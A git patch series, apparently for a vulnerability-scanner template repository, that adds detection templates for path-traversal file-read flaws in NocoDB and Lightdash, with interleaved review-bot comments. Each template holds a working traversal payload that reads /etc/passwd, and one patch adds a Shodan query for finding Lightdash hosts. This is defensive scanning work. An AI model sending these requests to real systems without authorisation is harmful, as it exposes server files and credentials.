From 0133afffc10bab02a3cc4269ea19bca21d6a00e8 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Tue, 20 Jun 2023 02:23:05 +0700
Subject: [PATCH 1/4] add(http/cves): CVE-2023-35843 & CVE-2023-35844

---
 http/cves/2023/CVE-2023-35843.yaml | 39 ++++++++++++++++++++++++++++++
 http/cves/2023/CVE-2023-35844.yaml | 32 ++++++++++++++++++++++++
 2 files changed, 71 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-35843.yaml
 create mode 100644 http/cves/2023/CVE-2023-35844.yaml

diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml
new file mode 100644
index 0000000000..4ccbd30fcb
--- /dev/null
+++ b/http/cves/2023/CVE-2023-35843.yaml
@@ -0,0 +1,39 @@
+id: CVE-2023-35843
+
+info:
+ name: NocoDB version <= 0.106.0 Arbitrary File Read
+ author: dwisiswant0
+ severity: high
+ description: |
+ NocoDB through 0.106.0 (or 0.109.1) has a path traversal vulnerability
+ that allows an unauthenticated attacker to access arbitrary files on
+ the server by manipulating the path parameter of the /download route.
+ This vulnerability could allow an attacker to access sensitive files
+ and data on the server, including configuration files, source code,
+ and other sensitive information.
+ reference:
+ - https://advisory.dw1.io/60
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-35843
+ metadata:
+ verified: true
+ tags: cve,cve2023,nocodb,lfi
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: word
+ part: header
+ words:
+ - "application/octet-stream"
+
+ - type: status
+ status:
+ - 200

diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml
new file mode 100644
index 0000000000..33e001886b
--- /dev/null
+++ b/http/cves/2023/CVE-2023-35844.yaml
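Review bot: The `info` block of the new CVE-2023-35843 template has no `classification` section, so consumers that correlate findings by CVE or CWE id (rather than by the `id` field or tags) cannot index it; add under `info` a `classification:` mapping with `cve-id: CVE-2023-35843` and `cwe-id: CWE-22` (path traversal), and take `cvss-metrics`/`cvss-score` from the NVD entry already listed under `reference` instead of estimating them. The same omission applies to the CVE-2023-35844 template in the next hunk. It would also help readers if the `metadata.verified: true` claim named what it was verified against, e.g. a comment `# verified against a local NocoDB instance at version <VERSION-PLACEHOLDER>` on that line.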
@@ -0,0 +1,32 @@
+id: CVE-2023-35844
+
+info:
+ name: Lightdash version <= 0.510.3 Arbitrary File Read
+ author: dwisiswant0
+ severity: high
+ description: |
+ packages/backend/src/routers in Lightdash before 0.510.3
+ has insecure file endpoints, e.g., they allow .. directory
+ traversal and do not ensure that an intended file extension
+ (.csv or .png) is used.
+ reference:
+ - https://advisory.dw1.io/59
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-35844
+ metadata:
+ verified: true
+ tags: cve,cve2023,lightdash,lfi
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200

From 8df19650d3087454cddcc99175e9e134b02832d8 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Tue, 20 Jun 2023 12:52:37 +0700
Subject: [PATCH 2/4] fix(CVE-2023-35843): update title & desc

---
 http/cves/2023/CVE-2023-35843.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml
index 4ccbd30fcb..e567b96490 100644
--- a/http/cves/2023/CVE-2023-35843.yaml
+++ b/http/cves/2023/CVE-2023-35843.yaml
@@ -1,11 +1,11 @@
 id: CVE-2023-35843

 info:
- name: NocoDB version <= 0.106.0 Arbitrary File Read
+ name: NocoDB version <= 0.106.1 Arbitrary File Read
 author: dwisiswant0
 severity: high
 description: |
- NocoDB through 0.106.0 (or 0.109.1) has a path traversal vulnerability
+ NocoDB through 0.106.1 has a path traversal vulnerability
 that allows an unauthenticated attacker to access arbitrary files on
 the server by manipulating the path parameter of the /download route.
 This vulnerability could allow an attacker to access sensitive files

From 839d1e1af07580f70aa8bb1132673662f4468c79 Mon Sep 17 00:00:00 2001
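Review bot: The affected-version claim in the CVE-2023-35844 template is inconsistent: `name` says `Lightdash version <= 0.510.3`, while the `description` (matching the NVD wording it references) says `Lightdash before 0.510.3`, which makes 0.510.3 the fixed release rather than a vulnerable one. Change the title to `name: Lightdash < 0.510.3 Arbitrary File Read` so triage based on the template name does not flag an already-patched version. The later patch in this series only touches the NocoDB template's title, so this mismatch is not addressed anywhere in the set.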
From: Dwi Siswanto
Date: Tue, 20 Jun 2023 18:06:36 +0700
Subject: [PATCH 3/4] fix(CVE-2023-35843): remove unnecessary matcher

---
 http/cves/2023/CVE-2023-35843.yaml | 5 -----
 1 file changed, 5 deletions(-)

diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml
index e567b96490..fd080187a4 100644
--- a/http/cves/2023/CVE-2023-35843.yaml
+++ b/http/cves/2023/CVE-2023-35843.yaml
@@ -29,11 +29,6 @@ http:
 regex:
 - "root:[x*]:0:0"

- - type: word
- part: header
- words:
- - "application/octet-stream"
-
 - type: status
 status:
 - 200

From 0be3f0be0e473a56d30f5cf65358335a04fda848 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Tue, 20 Jun 2023 18:07:23 +0700
Subject: [PATCH 4/4] fix(CVE-2023-35844): add shodan query metadata

---
 http/cves/2023/CVE-2023-35844.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml
index 33e001886b..e1fb8d6a68 100644
--- a/http/cves/2023/CVE-2023-35844.yaml
+++ b/http/cves/2023/CVE-2023-35844.yaml
@@ -14,6 +14,7 @@ info:
 - https://nvd.nist.gov/vuln/detail/CVE-2023-35844
 metadata:
 verified: true
+ shodan-query: title:"Lightdash"
 tags: cve,cve2023,lightdash,lfi

 http: